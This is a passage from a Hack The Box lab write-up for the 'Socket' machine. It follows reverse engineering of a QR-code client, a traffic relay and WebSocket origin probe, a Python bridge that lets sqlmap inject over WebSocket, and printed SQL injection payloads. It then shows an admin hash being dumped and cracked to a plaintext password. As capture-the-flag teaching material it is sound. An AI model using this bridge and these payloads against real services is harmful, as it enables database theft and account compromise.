Service Info: Host: qreader.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.39 seconds

OK. The usual portal seems to have an unusual domain for an HTB BOX. Let’s add it in the /etc/hosts file and try to navigate it.

Wappalyzer identifies the technologies used in the portal, but at the moment, this information cannot help me that much.

The portal offers QRCode conversion and processing functions. There are also two builds of the system, one for Windows and one for Linux, that can be downloaded and used from a local computer. It looks like my first investigation will be one of my favorite activities, a good reverse engineering session. But first, let’s start the program to understand at least its basic operation.

The program is a user interface system. If we try the sample file supplied with the executable, it is possible to trace the text contained within the QRCode.

kavigihan

Let’s immediately disassemble the application to understand if there is something hidden inside that can be useful. The program initialization block (you can reach it by clicking on the start function in the appropriate box) shows that the application main is started.

So let’s move to main (again selecting the function from the appropriate box) and follow the “jmp” to the specific address. We find ourselves in the heart of the application.

Looking at the flow itself, I can see that it could take me a long time to understand what it does just by reading the code (there are plenty of branches), so I start debugging and follow a single path; that way, at least, I’m sure I will quickly analyze the flow that is actually taken.

Going with the flow, I soon get to a function call that immediately displays the dialog. Strangely, the variable preceding it points to the executable I’m already debugging.

I restarted and proceeded with a new debugging session, this time stepping into the function that starts the app form. Apparently, the application forks.

We should have two processes of the same app.

┌──(in7rud3r㉿in7rud3r-kali)-[~/Dropbox/hackthebox]
└─$ ps -aux | grep qreader
in7rud3r 36498 5.7 0.0 2740 988 ? t 19:38 0:01 /home/in7rud3r/Downloads/app/qreader
in7rud3r 36548 2.3 0.9 962756 162472 ? Wl 19:38 0:00 /home/in7rud3r/Downloads/app/qreader
in7rud3r 36624 0.0 0.0 6304 2072 pts/5 S+ 19:38 0:00 grep --color=auto qreader

A block of code later, however, waits for the second thread to exit.

Since I can’t do much in this instance, it will be better to start the app without debugging and stick to the process being started.

Once started, we check which process is the parent of which. The process IDs should suffice (the older one is the child), but we leave nothing to chance.

┌──(in7rud3r㉿in7rud3r-kali)-[~/Dropbox/hackthebox]
└─$ pstree -p | grep qreader
           |              |-lightdm(921)-+-xfce4-session(955)-+-Thunar(1084)-+-qreader(38483)---qreader(38492)-+-{qreader}(38494)
           |              |              |                    |              |                                 |-{qreader}(38495)
           |              |              |                    |              |                                 |-{qreader}(38496)
           |              |              |                    |              |                                 |-{qreader}(38497)
           |              |              |                    |              |                                 |-{qreader}(38498)
           |              |              |                    |              |                                 `-{qreader}(38499)
                                                                                                                                                 
┌──(in7rud3r㉿in7rud3r-kali)-[~/Dropbox/hackthebox]
└─$ ps -aux | grep qreader  
in7rud3r   38483  2.4  0.0   2740   980 ?        S    19:45   0:01 /home/in7rud3r/Downloads/app/qreader
in7rud3r   38492  0.5  0.9 962792 162492 ?       Sl   19:45   0:00 /home/in7rud3r/Downloads/app/qreader
in7rud3r   38812  0.0  0.0   6304  2096 pts/5    R+   19:46   0:00 grep --color=auto qreader

OK. The opening and writing functions should use some imported standard IO functions, but I can’t find anything in the import section. I should find the button handles to retrieve the image encoding and decoding functions. Then there are the two function versions that update in the “about” menu, which return a connection error message. Let’s try to find the error strings to trace the calls it tries to make.


The strings are there, but I can’t debug them: after a few attempts at setting a breakpoint that never triggers, I settled on a more theoretical approach. The error message clearly indicates a failed network connection, so I aim at the portions of code that use network features. After a few tries I identified the “socket” function. For a change, I use a slightly less user-friendly tool: gdb.

I started the application and identified the process that gets duplicated.

┌──(in7rud3r㉿in7rud3r-kali)-[~/Downloads/app]
└─$ pstree -ap | grep qreader                                                  
  |   |   `-qreader,10054
  |   |       `-qreader,10059
  |   |           |-{qreader},10060
  |   |           |-{qreader},10061
  |   |           |-{qreader},10062
  |   |           |-{qreader},10063
  |   |           |-{qreader},10064
  |   |           `-{qreader},10065
  |   |   |-grep,10736 --color=auto qreader

Let’s attach gdb to the child process (the one that owns the worker threads).

┌──(in7rud3r㉿in7rud3r-kali)-[~/Downloads/app]
└─$ sudo gdb --pid 10059
GNU gdb (Debian 13.2-1) 13.2
Copyright (C) 2023 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
Attaching to process 10059
[New LWP 10060]
[New LWP 10061]
[New LWP 10062]
[New LWP 10063]
[New LWP 10064]
[New LWP 10065]

warning: .dynamic section for "/lib/x86_64-linux-gnu/libelf.so.1" is not at the expected address (wrong library or version mismatch?)
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
0x00007fed5b78dfff in __GI___poll (fds=0x1e56f90, nfds=5, timeout=-1) at ../sysdeps/unix/sysv/linux/poll.c:29
29      ../sysdeps/unix/sysv/linux/poll.c: No such file or directory.
(gdb) 

I put a breakpoint on the “socket” function and let the program run.

(gdb) b socket
Breakpoint 1 at 0x7fed4acb2d60 (3 locations)
(gdb) c
Continuing.

At this point, let’s trigger the connection event on the interface through one of the two menu items and see if something is activated in the debugger.

[New Thread 0x7fed317fe6c0 (LWP 13226)]
[Switching to Thread 0x7fed317fe6c0 (LWP 13226)]

Thread 8 "qreader" hit Breakpoint 1.3, __GI_socket () at ../sysdeps/unix/syscall-template.S:120
120     ../sysdeps/unix/syscall-template.S: No such file or directory.

Perfect, the breakpoint fires. Now we can follow the calls that come next, stepping one at a time. The socket() call itself doesn’t tell us much, and asking for its parameters is unhelpful, since the libc syscall wrapper carries no argument information:

(gdb) info args
No arguments.

Stepping (command “s”) eventually leads to the “open_socket” call, which shows some more parameters. Note that this open_socket is glibc’s nscd helper (nscd_helper.c), i.e. the name-service cache client used during name resolution, not a socket opened by the app itself:

(gdb) s
[New Thread 0x7fed30ffd6c0 (LWP 15775)]
122     in ../sysdeps/unix/syscall-template.S
[...]
open_socket (type=type@entry=GETFDHST, key=key@entry=0x7fed5b82bb87 "hosts", keylen=keylen@entry=6) at ./nscd/nscd_helper.c:172
172     ./nscd/nscd_helper.c: No such file or directory.
(gdb) info args
type = GETFDHST
key = 0x7fed5b82bb87 "hosts"
keylen = 6

The same function is hit again a few steps later, this time with request type GETAI, i.e. a getaddrinfo() lookup, and the key is the hostname the client is trying to resolve:

0x00007fed5b7dd739 in open_socket (type=type@entry=GETAI, key=key@entry=0x7fed403e3b30 "ws.qreader.htb", keylen=keylen@entry=15)
    at ./nscd/nscd_helper.c:171
171     in ./nscd/nscd_helper.c
(gdb) info args
type = GETAI
key = 0x7fed403e3b30 "ws.qreader.htb"
keylen = 15

Another domain that I will never reach unless I put it in my /etc/hosts file. Let’s add it and see what the application does.
Bingo: once the domain resolves, the calls start going through.

I then started sniffing packets on my network with Wireshark.


A quick look at the packets shows that, right after the TCP handshake (SYN, SYN/ACK), the client makes the real call, and the capture contains a lot of interesting information.


OK, pay attention now. To capture the traffic and be able to edit it, I need Burp Suite. I tried pointing the program at the Burp proxy through environment variables, but the process fork probably interfered with them, so the client never used the proxy. I bypassed the problem with these simple steps:

  1. In the /etc/hosts file, I made the ws.qreader.htb domain resolve to my own machine.
  2. The call goes to port 5789, so I added a new Burp proxy listener bound to 127.0.0.1 on port 5789 (this way the client’s calls land directly in Burp).
  3. In the same listener, under request handling, I set “redirect to host” 10.10.11.206 and “redirect to port” 5789, so that everything received is forwarded to the real server.

In this way, I can inspect every call the client makes.
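The same interception can be done without Burp when a client ignores proxy settings: with ws.qreader.htb pointed at 127.0.0.1 in /etc/hosts, a small relay on port 5789 accepts the client’s connection, opens its own connection to the real host and copies bytes both ways while logging them. This is an added example, not code from the original post; it assumes the target 10.10.11.206:5789 from the steps above and uses only the Python standard library.

```python
import socket
import threading
import time


def _pump(src, dst, label, log):
    """Copy bytes src -> dst until EOF, appending every chunk to log as (label, bytes)."""
    try:
        while True:
            data = src.recv(65536)
            if not data:
                break
            log.append((label, data))    # record before forwarding so nothing is lost on error
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)  # pass the half-close on to the other side
        except OSError:
            pass


def start_relay(upstream, log, listen_host="127.0.0.1", listen_port=0):
    """Accept on listen_host:listen_port and splice each connection to upstream=(host, port).

    Returns (bound_port, stop). listen_port=0 lets the kernel choose a free port.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(16)

    def accept_loop():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:              # listener closed by stop()
                return
            try:
                up = socket.create_connection(upstream, timeout=10)
            except OSError as exc:
                log.append(("ERR", repr(exc).encode()))
                client.close()
                continue
            up.settimeout(None)
            threading.Thread(target=_pump, args=(client, up, "C->S", log), daemon=True).start()
            threading.Thread(target=_pump, args=(up, client, "S->C", log), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()

    def stop():
        try:
            srv.shutdown(socket.SHUT_RDWR)  # wakes the blocked accept()
        except OSError:
            pass
        srv.close()

    return srv.getsockname()[1], stop


def first_request_line(log):
    """First line the client sent, e.g. the WebSocket upgrade 'GET /... HTTP/1.1' (None if nothing yet)."""
    for label, data in log:
        if label == "C->S":
            return data.split(b"\r\n", 1)[0].decode("latin-1")
    return None


if __name__ == "__main__":
    # Assumed target from the walkthrough; /etc/hosts must map ws.qreader.htb to 127.0.0.1.
    captured = []
    port, stop = start_relay(("10.10.11.206", 5789), captured, listen_port=5789)
    print(f"relaying 127.0.0.1:{port} -> 10.10.11.206:5789, Ctrl-C to stop")
    shown = 0
    try:
        while True:
            time.sleep(1)
            while shown < len(captured):
                label, data = captured[shown]
                shown += 1
                print(label, data[:200])
    except KeyboardInterrupt:
        stop()
```

The relay is transparent to the client, which still believes it is talking to ws.qreader.htb; the logged C->S chunks are where the WebSocket upgrade request and the JSON messages show up.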

Now I can take a closer look at the calls. I don’t know exactly how to attack a WebSocket, so I take a quick look around, starting with HackTricks (by now one of the penetration tester’s must-have resources).

Cross-site WebSocket hijacking (CSWSH) – HackTricks

This is an interesting git repository.

GitHub – PalindromeLabs/STEWS: A Security Tool for Enumerating WebSockets

Let’s take some time to understand how it works and then try it.

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/attack/git/STEWS/vuln-detect]
└─$ python3 STEWS-vuln-detect.py -u ws.qreader.htb:5789 -n -1
   Testing ws://ws.qreader.htb:5789
>>>Note: ws://ws.qreader.htb:5789 allowed http or https for origin
>>>Note: ws://ws.qreader.htb:5789 allowed null origin
>>>Note: ws://ws.qreader.htb:5789 allowed unusual char (possible parse error)
>>>VANILLA CSWSH DETECTED: ws://ws.qreader.htb:5789 likely vulnerable to vanilla CSWSH (any origin)
====Full list of vulnerable URLs===
['ws://ws.qreader.htb:5789']
['>>>VANILLA CSWSH DETECTED: ws://ws.qreader.htb:5789 likely vulnerable to vanilla CSWSH (any origin)']

I don’t believe it; it was too simple. Let’s investigate this vulnerability and how it can be exploited.
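What STEWS is testing above is whether the server completes the WebSocket handshake regardless of the Origin header. The added example below (not from the original post or from STEWS) builds the Upgrade request by hand, verifies the server’s Sec-WebSocket-Accept against RFC 6455 so that a fake 101 cannot fool the check, and probes a few origins; the host, port and root path are assumptions taken from the box.

```python
import base64
import hashlib
import os
import socket

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"   # fixed by RFC 6455


def expected_accept(sec_websocket_key):
    """Sec-WebSocket-Accept a compliant server must return for this client key."""
    digest = hashlib.sha1((sec_websocket_key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


def build_handshake(host, port, path="/", origin=None, key=None):
    """Client Upgrade request as bytes, plus the key used. origin=None omits the header."""
    key = key or base64.b64encode(os.urandom(16)).decode("ascii")
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}:{port}",
        "Upgrade: websocket",
        "Connection: Upgrade",
        f"Sec-WebSocket-Key: {key}",
        "Sec-WebSocket-Version: 13",
    ]
    if origin is not None:
        lines.append(f"Origin: {origin}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii"), key


def parse_response(raw):
    """(status_code, {lower-case header: value}) from raw HTTP response bytes."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    status_line, *header_lines = head.split("\r\n")
    parts = status_line.split(" ", 2)
    if len(parts) < 2 or not parts[1].isdigit():
        raise ValueError(f"not an HTTP response: {status_line!r}")
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return int(parts[1]), headers


def handshake_accepted(raw, key):
    """True only for a 101 whose Sec-WebSocket-Accept matches our key (a bare 101 is not enough)."""
    try:
        status, headers = parse_response(raw)
    except ValueError:
        return False
    return status == 101 and headers.get("sec-websocket-accept") == expected_accept(key)


def probe_origins(host, port, path="/", origins=None):
    """Live check (needs network): which Origin values the server completes the handshake for."""
    if origins is None:
        origins = [
            ("none", None),
            ("same", f"http://{host}:{port}"),
            ("foreign", "http://attacker.example"),   # hypothetical attacker site
            ("null", "null"),                         # what sandboxed iframes and file:// pages send
        ]
    results = {}
    for label, origin in origins:
        req, key = build_handshake(host, port, path, origin)
        with socket.create_connection((host, port), timeout=5) as s:
            s.sendall(req)
            raw = s.recv(4096)
        results[label] = handshake_accepted(raw, key)
    return results


def looks_like_vanilla_cswsh(results):
    """STEWS' 'vanilla CSWSH (any origin)' verdict: a foreign origin is accepted like the real one."""
    return bool(results.get("foreign"))


if __name__ == "__main__":
    # Assumed values from the box: host, port and a root path.
    print(probe_origins("ws.qreader.htb", 5789))
```

A missing Origin check is only exploitable when a browser attaches ambient credentials (cookies) to the handshake on behalf of a logged-in victim; this client is a desktop application, so on its own the finding leads nowhere.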

I tried various ways to exploit it, without success. Finally, peeking at the HTB forum, I learned that the intended vulnerability is a SQL injection. Bad news: pointing sqlmap at a WebSocket won’t be easy either. Luckily, there is a script that can help me.

Automating Blind SQL injection over WebSocket
Recently I have come across several CTF challenges on SQL injection over WebSocket. So I decided to build a vulnerable WebSocket web app for others to practice blind SQL injection over WebSocket. I spent a day building this on NodeJS from scratch which helped me better understand WebSocket implement…

After a quick look at the code, I only changed the payload handling so that a double quote doesn’t break the JSON string (as the comment recommends). Note that in a Python string literal '\"' is just a plain ", so the backslash itself has to be escaped for the replacement to actually escape anything.

message = unquote(payload).replace('"', '\\"') # escape double quotes so the payload does not break the JSON structure
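The bridge pattern that script implements, as an added standard-library example (not the linked script nor the original post’s code): sqlmap talks plain HTTP to a local listener, which wraps the version parameter in the JSON message and pushes it over the WebSocket, returning whatever comes back. json.dumps does the quote escaping, so no manual replace is needed. The WebSocket URL and the {"version": ...} message shape are assumptions; the live transport uses the third-party websocket-client package, but the bridge accepts any callable, so it can be exercised with a fake transport.

```python
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

WS_URL = "ws://ws.qreader.htb:5789/version"   # assumed endpoint; adjust to what Burp showed


def build_ws_message(version):
    """JSON message the service expects (shape assumed). json.dumps escapes '"' and '\\' itself."""
    return json.dumps({"version": version})


def websocket_transport(url):
    """One request per connection using the websocket-client package (pip install websocket-client)."""
    def send(message):
        import websocket   # imported lazily so the bridge itself needs only the standard library
        ws = websocket.create_connection(url, timeout=10)
        try:
            ws.send(message)
            return ws.recv()
        finally:
            ws.close()
    return send


def make_handler(transport):
    """HTTP handler that turns GET /version?version=<payload> into one WebSocket message."""
    class Bridge(BaseHTTPRequestHandler):
        def do_GET(self):
            query = parse_qs(urlparse(self.path).query, keep_blank_values=True)
            version = query.get("version", [""])[0]       # parse_qs already URL-decodes sqlmap's payload
            try:
                reply, status = transport(build_ws_message(version)), 200
            except Exception as exc:                       # surface transport failures to sqlmap as 502
                reply, status = f"bridge error: {exc}", 502
            body = reply if isinstance(reply, bytes) else str(reply).encode("utf-8")
            self.send_response(status)
            self.send_header("Content-Type", "text/plain; charset=utf-8")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def log_message(self, *args):   # keep sqlmap's dozens of requests from flooding the terminal
            pass
    return Bridge


def start_bridge(transport, host="127.0.0.1", port=0):
    """Serve in a background thread; returns (bound_port, shutdown)."""
    server = HTTPServer((host, port), make_handler(transport))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server.server_address[1], server.shutdown


if __name__ == "__main__":
    port, _ = start_bridge(websocket_transport(WS_URL), port=8081)
    print(f"sqlmap -u 'http://127.0.0.1:{port}/version?version=0.0.2' --batch --level 5 --risk 3 --tables")
    threading.Event().wait()
```

Because the server’s reply is returned verbatim as the HTTP body, sqlmap can use boolean-, UNION- and time-based techniques through the bridge exactly as it would against a plain web page.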

And fire away!

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/hackthebox/_10.10.11.206 - Socket (lin)/attack/py]
└─$ sqlmap -u 'http://localhost:8081/version?version=0.0.2' --batch --level 5 --risk 3 --dbs
        ___
       __H__                                                                                                                         
 ___ ___[(]_____ ___ ___  {1.6.7#stable}                                                                                             
|_ -| . ["]     | .'| . |                                                                                                            
|___|_  [']_|_|_|__,|  _|                                                                                                            
      |_|V...       |_|   https://sqlmap.org                                                                                         

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:14:57 /2023-06-25/

[21:14:57] [INFO] testing connection to the target URL
[21:14:57] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.5')
[21:14:57] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
[21:14:57] [INFO] testing if the target URL content is stable
[21:14:58] [INFO] target URL content is stable
[21:14:58] [INFO] testing if GET parameter 'version' is dynamic
[21:14:58] [INFO] GET parameter 'version' appears to be dynamic
[21:14:58] [WARNING] heuristic (basic) test shows that GET parameter 'version' might not be injectable
[21:14:59] [INFO] testing for SQL injection on GET parameter 'version'
[21:14:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:15:02] [INFO] GET parameter 'version' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[21:15:11] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'SQLite' 
it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[21:15:11] [INFO] testing 'Generic inline queries'
[21:15:11] [INFO] testing 'SQLite inline queries'
[21:15:12] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[21:15:12] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
[21:15:13] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[21:15:20] [INFO] GET parameter 'version' appears to be 'SQLite > 2.0 AND time-based blind (heavy query)' injectable 
[21:15:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:15:20] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:15:20] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[21:15:22] [INFO] target URL appears to have 4 columns in query
[21:15:23] [INFO] GET parameter 'version' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'version' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: version (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: version=0.0.2" AND 1458=1458-- gddH

    Type: time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: version=0.0.2" AND 6925=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- MMbe

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: version=0.0.2" UNION ALL SELECT CHAR(113,98,98,106,113)||CHAR(97,100,107,108,90,74,75,68,112,104,76,90,84,85,119,84,117,117,89,109,103,112,74,72,116,88,74,72,72,80,99,122,110,107,67,122,122,72,115,81)||CHAR(113,98,113,98,113),NULL,NULL,NULL-- VJHs
---
[21:15:23] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[21:15:23] [WARNING] on SQLite it is not possible to enumerate databases (use only '--tables')
[21:15:23] [INFO] fetched data logged to text files under '/home/in7rud3r/.local/share/sqlmap/output/localhost'
[21:15:23] [WARNING] your sqlmap version is outdated

[*] ending @ 21:15:23 /2023-06-25/

From here everything should be simpler, let’s list the tables.

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/hackthebox/_10.10.11.206 - Socket (lin)/attack/py]
└─$ sqlmap -u 'http://localhost:8081/version?version=0.0.2' --batch --level 5 --risk 3 --tables -DB SQLite
        ___
       __H__                                                                                                                         
 ___ ___[']_____ ___ ___  {1.6.7#stable}                                                                                             
|_ -| . [)]     | .'| . |                                                                                                            
|___|_  ["]_|_|_|__,|  _|                                                                                                            
      |_|V...       |_|   https://sqlmap.org                                                                                         

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:21:56 /2023-06-25/

[21:21:56] [INFO] resuming back-end DBMS 'sqlite' 
[21:21:56] [INFO] testing connection to the target URL
[21:21:57] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.5')
[21:21:57] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: version (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: version=0.0.2" AND 1458=1458-- gddH

    Type: time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: version=0.0.2" AND 6925=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- MMbe

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: version=0.0.2" UNION ALL SELECT CHAR(113,98,98,106,113)||CHAR(97,100,107,108,90,74,75,68,112,104,76,90,84,85,119,84,117,117,89,109,103,112,74,72,116,88,74,72,72,80,99,122,110,107,67,122,122,72,115,81)||CHAR(113,98,113,98,113),NULL,NULL,NULL-- VJHs
---
[21:21:57] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[21:21:57] [INFO] fetching tables for database: 'SQLite_masterdb'
<current>
[6 tables]
+-----------------+
| answers         |
| info            |
| reports         |
| sqlite_sequence |
| users           |
| versions        |
+-----------------+

[21:21:57] [INFO] fetched data logged to text files under '/home/in7rud3r/.local/share/sqlmap/output/localhost'
[21:21:57] [WARNING] your sqlmap version is outdated

[*] ending @ 21:21:57 /2023-06-25/

And let’s take a look inside the users table.

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/hackthebox/_10.10.11.206 - Socket (lin)/attack/py]
└─$ sqlmap -u 'http://localhost:8081/version?version=0.0.2' --dump -D SQLite -T users
        ___
       __H__                                                                                                                         
 ___ ___[']_____ ___ ___  {1.6.7#stable}                                                                                             
|_ -| . [,]     | .'| . |                                                                                                            
|___|_  [.]_|_|_|__,|  _|                                                                                                            
      |_|V...       |_|   https://sqlmap.org                                                                                         

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:28:20 /2023-06-25/

[21:28:21] [INFO] resuming back-end DBMS 'sqlite' 
[21:28:21] [INFO] testing connection to the target URL
[21:28:21] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.5')
[21:28:21] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: version (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: version=0.0.2" AND 1458=1458-- gddH

    Type: time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: version=0.0.2" AND 6925=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- MMbe

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: version=0.0.2" UNION ALL SELECT CHAR(113,98,98,106,113)||CHAR(97,100,107,108,90,74,75,68,112,104,76,90,84,85,119,84,117,117,89,109,103,112,74,72,116,88,74,72,72,80,99,122,110,107,67,122,122,72,115,81)||CHAR(113,98,113,98,113),NULL,NULL,NULL-- VJHs
---
[21:28:21] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[21:28:21] [INFO] fetching columns for table 'users' 
[21:28:21] [INFO] fetching entries for table 'users'
[21:28:21] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] 
do you want to crack them via a dictionary-based attack? [Y/n/q] 
[21:28:36] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 
[21:28:42] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] 
[21:28:46] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[21:28:46] [INFO] starting 4 processes 
[21:28:55] [WARNING] no clear password(s) found                                                                                     
Database: <current>
Table: users
[1 entry]
+----+-------+----------------------------------+----------+
| id | role  | password                         | username |
+----+-------+----------------------------------+----------+
| 1  | admin | 0c090c365fa0559b151a43e0fea39710 | admin    |
+----+-------+----------------------------------+----------+

[21:28:55] [INFO] table 'SQLite_masterdb.users' dumped to CSV file '/home/in7rud3r/.local/share/sqlmap/output/localhost/dump/SQLite_masterdb/users.csv'                                                                                                                   
[21:28:55] [INFO] fetched data logged to text files under '/home/in7rud3r/.local/share/sqlmap/output/localhost'
[21:28:55] [WARNING] your sqlmap version is outdated

[*] ending @ 21:28:55 /2023-06-25/

Nothing simpler (provided the password is in the rockyou dictionary). Save just the hash to a file, and hashcat does the rest.

┌──(in7rud3r㉿in7rud3r-kali)-[/tmp/hc]
└─$ hashcat -a 0 -m 0 -O pwd_only.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.5) starting

[...]
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

[...]
0c090c365fa0559b151a43e0fea39710:denjanjade122566         
[...]

Started: Wed Jun 28 22:43:43 2023
Stopped: Wed Jun 28 22:44:04 2023

Well, I have a password. What about the account? Something like “kavigihan”? Let’s try!

┌──(in7rud3r㉿in7rud3r-kali)-[~/Downloads/app]
└─$ ssh kavigihan@10.10.11.206                                              
The authenticity of host '10.10.11.206 (10.10.11.206)' can't be established.
ED25519 key fingerprint is SHA256:LJb8mGFiqKYQw3uev+b/ScrLuI4Fw7jxHJAoaLVPJLA.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.206' (ED25519) to the list of known hosts.
kavigihan@10.10.11.206's password: 
Permission denied, please try again.

So, let’s take a look at the other tables.

Table: reports
[2 entries]
+----+---------------------------+---------------------------------------------------------------------------------------------------------------------+---------------+---------------+
| id | subject                   | description                                                                                                         | reported_date | reporter_name |
+----+---------------------------+---------------------------------------------------------------------------------------------------------------------+---------------+---------------+
| 1  | Accept JPEG files         | Is there a way to convert JPEG images with this tool? Or should I convert my JPEG to PNG and then use it?           | 13/08/2022    | Jason         |
| 2  | Converting non-ascii text | When I try to embed non-ascii text, it always gives me an error. It would be nice if you could take a look at this. | 22/09/2022    | Mike          |
+----+---------------------------+---------------------------------------------------------------------------------------------------------------------+---------------+---------------+

Dumping the reports table went relatively quickly; the answers table took much longer, because sqlmap had to fall back to time-based blind extraction. Luckily it’s only two records, so it was worth the wait!

┌──(in7rud3r㉿in7rud3r-kali)-[~/Downloads/app]
└─$ sqlmap -u 'http://localhost:8081/version?version=0.0.2' --dump -D SQLite -T answers
        ___
       __H__                                                                                                                         
 ___ ___[.]_____ ___ ___  {1.6.7#stable}                                                                                             
|_ -| . [(]     | .'| . |                                                                                                            
|___|_  [(]_|_|_|__,|  _|                                                                                                            
      |_|V...       |_|   https://sqlmap.org                                                                                         

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:12:56 /2023-06-28/

[23:12:56] [INFO] resuming back-end DBMS 'sqlite' 
[23:12:56] [INFO] testing connection to the target URL
[23:12:57] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.5')
[23:12:57] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: version (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: version=0.0.2" AND 1458=1458-- gddH

    Type: time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
